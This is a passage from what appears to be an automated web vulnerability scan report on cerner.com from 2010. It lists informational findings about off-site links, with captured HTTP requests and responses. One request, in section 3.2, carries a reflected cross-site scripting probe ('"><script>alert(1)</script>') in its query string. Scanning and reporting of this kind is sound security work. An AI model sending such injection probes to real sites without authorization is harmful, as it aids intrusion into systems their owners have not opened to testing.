- http://twitter.com/cerner/
- http://www.facebook.com/cerner/
- http://www.ucern.com/
- http://youtube.com/cernercorporation
- https://udevelop.ucern.com/
- https://www.ucern.com/docs/DOC-86145
Request
GET /?langtype=1033 HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:05 GMT Content-Length: 15361 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/home.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]... <li class="util-nav-ucern"><a title="uCern" href="http://www.ucern.com">uCern</a> ...[SNIP]... <div class="style-brown"><a href="https://www.ucern.com/docs/DOC-86145" title="Presentations"><img border="0" src="/uploadedImages/2_herotemplate-01.jpg" alt="CHC 2010" title="CHC 2010" /> ...[SNIP]... <li class="foot-nav-ucern"><a href="http://www.ucern.com">uCern</a></li> <li class="foot-nav-udev"><a href="https://udevelop.ucern.com/">uDevelop</a> ...[SNIP]... <li><a target="_blank" href="http://www.ucern.com/"><img border="0" class="design_selected_field" alt="UCern" src="http://wedit.cerner.com/include/img/ico-ucern.gif" /> ...[SNIP]... <li><a target="_blank" href="http://youtube.com/cernercorporation" title="&nbsp;&nbsp;"><img border="0" src="http://wedit.cerner.com/uploadedImages/youtubelogo_small.jpg" alt="icon_Youtube" title="icon_Youtube" class="design_selected_field" /> ...[SNIP]... <li><a target="_blank" href="http://www.facebook.com/cerner/"><img alt="Facebook" src="/include/img/ico-facebook.gif" /> ...[SNIP]... <li><a target="_blank" href="http://twitter.com/cerner/"><img alt="Twitter" src="/include/img/ico-twitter.gif" /> ...[SNIP]...
|
3.2. http://cerner.com/WebResource.axd
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/WebResource.axd |
Issue detail
The page was loaded from a URL containing a query string:- http://cerner.com/WebResource.axd?4ad6c"><script>alert(1)</script>dede2f2bdc=1
The response contains the following links to other domains:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
- http://twitter.com/cerner/
- http://www.facebook.com/cerner/
- http://www.ucern.com/
- http://youtube.com/cernercorporation
- https://udevelop.ucern.com/
Request
GET /WebResource.axd?4ad6c"><script>alert(1)</script>dede2f2bdc=1 HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: cerner.com Cookie: EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 03:10:11 GMT Content-Length: 13053
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/blue.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]... <li class="util-nav-ucern"><a title="uCern" href="http://www.ucern.com">uCern</a> ...[SNIP]... <li class="foot-nav-ucern"><a href="http://www.ucern.com">uCern</a></li> <li class="foot-nav-udev"><a href="https://udevelop.ucern.com/">uDevelop</a> ...[SNIP]... <li><a target="_blank" href="http://www.ucern.com/"><img border="0" class="design_selected_field" alt="UCern" src="http://wedit.cerner.com/include/img/ico-ucern.gif" /> ...[SNIP]... <li><a target="_blank" href="http://youtube.com/cernercorporation" title="&nbsp;&nbsp;"><img border="0" src="http://wedit.cerner.com/uploadedImages/youtubelogo_small.jpg" alt="icon_Youtube" title="icon_Youtube" class="design_selected_field" /> ...[SNIP]... <li><a target="_blank" href="http://www.facebook.com/cerner/"><img alt="Facebook" src="/include/img/ico-facebook.gif" /> ...[SNIP]... <li><a target="_blank" href="http://twitter.com/cerner/"><img alt="Twitter" src="/include/img/ico-twitter.gif" /> ...[SNIP]...
|
3.3. http://cerner.com/error.aspx
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/error.aspx |
Issue detail
The page was loaded from a URL containing a query string:- http://cerner.com/error.aspx?err=404
The response contains the following links to other domains:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
- http://twitter.com/cerner/
- http://www.facebook.com/cerner/
- http://www.ucern.com/
- http://youtube.com/cernercorporation
- https://udevelop.ucern.com/
Request
GET /error.aspx?err=404 HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:19:28 GMT Content-Length: 12955 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/blue.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]... <li class="util-nav-ucern"><a title="uCern" href="http://www.ucern.com">uCern</a> ...[SNIP]... <li class="foot-nav-ucern"><a href="http://www.ucern.com">uCern</a></li> <li class="foot-nav-udev"><a href="https://udevelop.ucern.com/">uDevelop</a> ...[SNIP]... <li><a target="_blank" href="http://www.ucern.com/"><img border="0" class="design_selected_field" alt="UCern" src="http://wedit.cerner.com/include/img/ico-ucern.gif" /> ...[SNIP]... <li><a target="_blank" href="http://youtube.com/cernercorporation" title="&nbsp;&nbsp;"><img border="0" src="http://wedit.cerner.com/uploadedImages/youtubelogo_small.jpg" alt="icon_Youtube" title="icon_Youtube" class="design_selected_field" /> ...[SNIP]... <li><a target="_blank" href="http://www.facebook.com/cerner/"><img alt="Facebook" src="/include/img/ico-facebook.gif" /> ...[SNIP]... <li><a target="_blank" href="http://twitter.com/cerner/"><img alt="Twitter" src="/include/img/ico-twitter.gif" /> ...[SNIP]...
|
3.4. http://cerner.com/solutions/Hospitals_and_Health_Systems/Radiology/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/Hospitals_and_Health_Systems/Radiology/ |
Issue detail
The page was loaded from a URL containing a query string:- http://cerner.com/solutions/Hospitals_and_Health_Systems/Radiology/?WT.mc_id=nrtw
The response contains the following links to other domains:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
- http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab
- http://player.ooyala.com/player.js?width=640&height=360&embedCode=d1N2twMTpxcJgGTKcLXM_QfZhmnqv4eG
- http://player.ooyala.com/player.swf?embedCode=d1N2twMTpxcJgGTKcLXM_QfZhmnqv4eG&version=2
- http://twitter.com/cerner/
- http://www.facebook.com/cerner/
- http://www.ucern.com/
- http://www.ucern.com/groups/3708
- http://www.ucern.com/groups/3904
- http://www.ucern.com/groups/3907
- http://www.ucern.com/groups/4002
- http://www.ucern.com/groups/5419
- http://www.ucern.com/groups/7070
- http://youtube.com/cernercorporation
- https://udevelop.ucern.com/
- https://wiki.ucern.com/login.action;jsessionid=E3275621F7967E8E45203CDE24485E18?os_destination=%2Fdisplay%2Fpublic%2FprovisionworkstationHP%2FClinical%2BImaging%2BConformance%2BStatements
Request
GET /solutions/Hospitals_and_Health_Systems/Radiology/?WT.mc_id=nrtw HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:08 GMT Content-Length: 25375 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]... <li class="util-nav-ucern"><a title="uCern" href="http://www.ucern.com">uCern</a> ...[SNIP]... </p> <script src="http://player.ooyala.com/player.js?width=640&height=360&embedCode=d1N2twMTpxcJgGTKcLXM_QfZhmnqv4eG" type="text/javascript"></script><noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="ooyalaPlayer_7cp25_geyzl4g2" width="640" height="360" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param name="movie" value="http://player.ooyala.com/player.swf?embedCode=d1N2twMTpxcJgGTKcLXM_QfZhmnqv4eG&version=2" /> ...[SNIP]... <param name="flashvars" value="embedType=noscriptObjectTag&embedCode=d1N2twMTpxcJgGTKcLXM_QfZhmnqv4eG" /><embed src="http://player.ooyala.com/player.swf?embedCode=d1N2twMTpxcJgGTKcLXM_QfZhmnqv4eG&version=2" bgcolor="#000000" width="640" height="360" name="ooyalaPlayer_7cp25_geyzl4g2" align="middle" play="true" loop="false" allowscriptaccess="always" allowfullscreen="true" type="application/x-shockwave-flash" flashvars="&embedCode=d1N2twMTpxcJgGTKcLXM_QfZhmnqv4eG" pluginspage="http://www.adobe.com/go/getflashplayer"></embed> ...[SNIP]... <li><a href="https://wiki.ucern.com/login.action;jsessionid=E3275621F7967E8E45203CDE24485E18?os_destination=%2Fdisplay%2Fpublic%2FprovisionworkstationHP%2FClinical%2BImaging%2BConformance%2BStatements" title="Clinical Imaging Conforming Statements">View Clinical Imaging Conformance Statements from Cerner</a> ...[SNIP]... <li><a href="http://www.ucern.com/groups/5419" title="Special Interest Groups (SIGs)">Special Interest Groups (SIGs) <img align="bottom" src="/uploadedImages/ico-arrow-solutions.gif" alt="Arrow" title="Arrow" class="link" /> ...[SNIP]... <li><a href="http://www.ucern.com/groups/3708" title="Clinical Transformation">Clinical Transformation <img align="bottom" src="/uploadedImages/ico-arrow-solutions.gif" alt="Arrow" title="Arrow" class="link" /> ...[SNIP]... <li><a href="http://www.ucern.com/groups/4002" title="Classic Radiology (RadNet)">Classic Radiology (RadNet) <img align="bottom" src="/uploadedImages/ico-arrow-solutions.gif" alt="Arrow" title="Arrow" class="link" /> ...[SNIP]... <li><a href="http://www.ucern.com/groups/3907" title="Imaging Community">Imaging Community <img align="bottom" src="/uploadedImages/ico-arrow-solutions.gif" alt="Arrow" title="Arrow" class="link" /> ...[SNIP]... <li><a href="http://www.ucern.com/groups/7070" title="Radiologist Forum">Radiologist Forum <img align="bottom" src="/uploadedImages/ico-arrow-solutions.gif" alt="Arrow" title="Arrow" class="link" /> ...[SNIP]... <li><a href="http://www.ucern.com/groups/3904" title="Radiology SIG Community">Radiology SIG Community <img align="bottom" src="/uploadedImages/ico-arrow-solutions.gif" alt="Arrow" title="Arrow" class="link" /> ...[SNIP]... <li class="foot-nav-ucern"><a href="http://www.ucern.com">uCern</a></li> <li class="foot-nav-udev"><a href="https://udevelop.ucern.com/">uDevelop</a> ...[SNIP]... <li><a target="_blank" href="http://www.ucern.com/"><img border="0" class="design_selected_field" alt="UCern" src="http://wedit.cerner.com/include/img/ico-ucern.gif" /> ...[SNIP]... <li><a target="_blank" href="http://youtube.com/cernercorporation" title="&nbsp;&nbsp;"><img border="0" src="http://wedit.cerner.com/uploadedImages/youtubelogo_small.jpg" alt="icon_Youtube" title="icon_Youtube" class="design_selected_field" /> ...[SNIP]... <li><a target="_blank" href="http://www.facebook.com/cerner/"><img alt="Facebook" src="/include/img/ico-facebook.gif" /> ...[SNIP]... <li><a target="_blank" href="http://twitter.com/cerner/"><img alt="Twitter" src="/include/img/ico-twitter.gif" /> ...[SNIP]...
|
3.5. http://cerner.com/solutions/Hospitals_and_Health_Systems/Revenue_Cycle/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/Hospitals_and_Health_Systems/Revenue_Cycle/ |
Issue detail
The page was loaded from a URL containing a query string:- http://cerner.com/solutions/Hospitals_and_Health_Systems/Revenue_Cycle/?WT.mc_id=revcycle
The response contains the following links to other domains:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
- http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab
- http://player.ooyala.com/player.js?width=640&height=360&embedCode=9zN2twMTr6yOb8QytNpvIlAE7YlUpRGh
- http://player.ooyala.com/player.swf?embedCode=9zN2twMTr6yOb8QytNpvIlAE7YlUpRGh&version=2
- http://twitter.com/cerner/
- http://www.facebook.com/cerner/
- http://www.ucern.com/
- http://www.ucern.com/groups/6273
- http://youtube.com/cernercorporation
- https://udevelop.ucern.com/
Request
GET /solutions/Hospitals_and_Health_Systems/Revenue_Cycle/?WT.mc_id=revcycle HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:12 GMT Content-Length: 23889 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]... <li class="util-nav-ucern"><a title="uCern" href="http://www.ucern.com">uCern</a> ...[SNIP]... </ul> <script type="text/javascript" src="http://player.ooyala.com/player.js?width=640&height=360&embedCode=9zN2twMTr6yOb8QytNpvIlAE7YlUpRGh"></script><noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="ooyalaPlayer_422de_geyz8s24" width="640" height="360" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param name="movie" value="http://player.ooyala.com/player.swf?embedCode=9zN2twMTr6yOb8QytNpvIlAE7YlUpRGh&version=2" /> ...[SNIP]... <param name="flashvars" value="embedType=noscriptObjectTag&embedCode=9zN2twMTr6yOb8QytNpvIlAE7YlUpRGh" /><embed src="http://player.ooyala.com/player.swf?embedCode=9zN2twMTr6yOb8QytNpvIlAE7YlUpRGh&version=2" bgcolor="#000000" width="640" height="360" name="ooyalaPlayer_422de_geyz8s24" align="middle" play="true" loop="false" allowscriptaccess="always" allowfullscreen="true" type="application/x-shockwave-flash" flashvars="&embedCode=9zN2twMTr6yOb8QytNpvIlAE7YlUpRGh" pluginspage="http://www.adobe.com/go/getflashplayer"></embed> ...[SNIP]... <li><a title="Automatic Messaging" href="http://www.ucern.com/groups/6273">Automatic Messaging <img align="bottom" class="link" title="Arrow" alt="Arrow" src="/uploadedImages/ico-arrow-solutions.gif" /> ...[SNIP]... <li class="foot-nav-ucern"><a href="http://www.ucern.com">uCern</a></li> <li class="foot-nav-udev"><a href="https://udevelop.ucern.com/">uDevelop</a> ...[SNIP]... <li><a target="_blank" href="http://www.ucern.com/"><img border="0" class="design_selected_field" alt="UCern" src="http://wedit.cerner.com/include/img/ico-ucern.gif" /> ...[SNIP]... <li><a target="_blank" href="http://youtube.com/cernercorporation" title="&nbsp;&nbsp;"><img border="0" src="http://wedit.cerner.com/uploadedImages/youtubelogo_small.jpg" alt="icon_Youtube" title="icon_Youtube" class="design_selected_field" /> ...[SNIP]... <li><a target="_blank" href="http://www.facebook.com/cerner/"><img alt="Facebook" src="/include/img/ico-facebook.gif" /> ...[SNIP]... <li><a target="_blank" href="http://twitter.com/cerner/"><img alt="Twitter" src="/include/img/ico-twitter.gif" /> ...[SNIP]...
|
3.6. http://cerner.com/solutions/employers/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/employers/ |
Issue detail
The page was loaded from a URL containing a query string:- http://cerner.com/solutions/employers/?WT.mc_id=employer
The response contains the following links to other domains:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
- http://twitter.com/cerner/
- http://www.facebook.com/cerner/
- http://www.ucern.com/
- http://youtube.com/cernercorporation
- https://udevelop.ucern.com/
Request
GET /solutions/employers/?WT.mc_id=employer HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:06 GMT Content-Length: 22659 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]... <li class="util-nav-ucern"><a title="uCern" href="http://www.ucern.com">uCern</a> ...[SNIP]... <li class="foot-nav-ucern"><a href="http://www.ucern.com">uCern</a></li> <li class="foot-nav-udev"><a href="https://udevelop.ucern.com/">uDevelop</a> ...[SNIP]... <li><a target="_blank" href="http://www.ucern.com/"><img border="0" class="design_selected_field" alt="UCern" src="http://wedit.cerner.com/include/img/ico-ucern.gif" /> ...[SNIP]... <li><a target="_blank" href="http://youtube.com/cernercorporation" title="&nbsp;&nbsp;"><img border="0" src="http://wedit.cerner.com/uploadedImages/youtubelogo_small.jpg" alt="icon_Youtube" title="icon_Youtube" class="design_selected_field" /> ...[SNIP]... <li><a target="_blank" href="http://www.facebook.com/cerner/"><img alt="Facebook" src="/include/img/ico-facebook.gif" /> ...[SNIP]... <li><a target="_blank" href="http://twitter.com/cerner/"><img alt="Twitter" src="/include/img/ico-twitter.gif" /> ...[SNIP]...
|
3.7. http://cerner.com/solutions/individuals_and_families/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/individuals_and_families/ |
Issue detail
The page was loaded from a URL containing a query string:- http://cerner.com/solutions/individuals_and_families/?WT.mc_id=consumer
The response contains the following links to other domains:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
- http://twitter.com/cerner/
- http://www.facebook.com/cerner/
- http://www.ucern.com/
- http://youtube.com/cernercorporation
- https://udevelop.ucern.com/
Request
GET /solutions/individuals_and_families/?WT.mc_id=consumer HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:14 GMT Content-Length: 23289 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]... <li class="util-nav-ucern"><a title="uCern" href="http://www.ucern.com">uCern</a> ...[SNIP]... <li class="foot-nav-ucern"><a href="http://www.ucern.com">uCern</a></li> <li class="foot-nav-udev"><a href="https://udevelop.ucern.com/">uDevelop</a> ...[SNIP]... <li><a target="_blank" href="http://www.ucern.com/"><img border="0" class="design_selected_field" alt="UCern" src="http://wedit.cerner.com/include/img/ico-ucern.gif" /> ...[SNIP]... <li><a target="_blank" href="http://youtube.com/cernercorporation" title="&nbsp;&nbsp;"><img border="0" src="http://wedit.cerner.com/uploadedImages/youtubelogo_small.jpg" alt="icon_Youtube" title="icon_Youtube" class="design_selected_field" /> ...[SNIP]... <li><a target="_blank" href="http://www.facebook.com/cerner/"><img alt="Facebook" src="/include/img/ico-facebook.gif" /> ...[SNIP]... <li><a target="_blank" href="http://twitter.com/cerner/"><img alt="Twitter" src="/include/img/ico-twitter.gif" /> ...[SNIP]...
|
3.8. http://cerner.com/solutions/medical_devices/
previous
next
Summary
Severity: |
Information |
Confidence: |
Certain |
Host: |
http://cerner.com |
Path: |
/solutions/medical_devices/ |
Issue detail
The page was loaded from a URL containing a query string:- http://cerner.com/solutions/medical_devices/?WT.mc_id=devicelaunch
The response contains the following links to other domains:- http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
- http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab
- http://player.ooyala.com/player.js?width=300&height=168&embedCode=w5OGtwMToGzzFSbsIkvVPOD7xOtH-Ibm
- http://player.ooyala.com/player.swf?embedCode=w5OGtwMToGzzFSbsIkvVPOD7xOtH-Ibm&version=2
- http://twitter.com/cerner/
- http://www.facebook.com/cerner/
- http://www.ucern.com/
- http://youtube.com/cernercorporation
- https://udevelop.ucern.com/
Request
GET /solutions/medical_devices/?WT.mc_id=devicelaunch HTTP/1.1 Host: cerner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=cerner.com&SiteLanguage=1033; EktGUID=720043fd-88ba-4a98-87dc-c3c9e0a34285; EkAnalytics=0; ASP.NET_SessionId=nijjkf55lkzp2w33zp2qyj45;
|
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 12 Nov 2010 04:16:24 GMT Content-Length: 25473 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta n ...[SNIP]... <link rel="stylesheet" href="/include/css/green.css" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> ...[SNIP]... <li class="util-nav-ucern"><a title="uCern" href="http://www.ucern.com">uCern</a> ...[SNIP]... <div class="img-float"><script type="text/javascript" src="http://player.ooyala.com/player.js?width=300&height=168&embedCode=w5OGtwMToGzzFSbsIkvVPOD7xOtH-Ibm"></script><noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="ooyalaPlayer_5avs3_geyzwvh7" width="300" height="168" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param name="movie" value="http://player.ooyala.com/player.swf?embedCode=w5OGtwMToGzzFSbsIkvVPOD7xOtH-Ibm&version=2" /> ...[SNIP]... <param name="flashvars" value="embedType=noscriptObjectTag&embedCode=w5OGtwMToGzzFSbsIkvVPOD7xOtH-Ibm" /><embed src="http://player.ooyala.com/player.swf?embedCode=w5OGtwMToGzzFSbsIkvVPOD7xOtH-Ibm&version=2" bgcolor="#000000" width="300" height="168" name="ooyalaPlayer_5avs3_geyzwvh7" align="middle" play="true" loop="false" allowscriptaccess="always" allowfullscreen="true" type="application/x-shockwave-flash" flashvars="&embedCode=w5OGtwMToGzzFSbsIkvVPOD7xOtH-Ibm" pluginspage="http://www.adobe.com/go/getflashplayer"></embed> ...[SNIP]... <li class="foot-nav-ucern"><a href="http://www.ucern.com">uCern</a></li> <li class="foot-nav-udev"><a href="https://udevelop.ucern.com/">uDevelop</a> ...[SNIP]... <li><a target="_blank" href="http://www.ucern.com/"><img border="0" class="design_selected_field" alt="UCern" src="http://wedit.cerner.com/include/img/ico-ucern.gif" /> ...[SNIP]... <li><a target="_blank" href="http://youtube.com/cernercorporation" title="&nbsp;&nbsp;"><img border="0" src="http://wedit.cerner.com/uploadedImages/youtubelogo_small.jpg" alt="icon_Youtube" title="icon_Youtube" class="design_selected_field" /> ...[SNIP]... <li><a target="_blank" href="http://www.facebook.com/cerner/"><img alt="Facebook" src="/include/img/ico-facebook.gif" /> ...[SNIP]... <li><a target="_blank" href="http://twitter.com/cerner/"><img 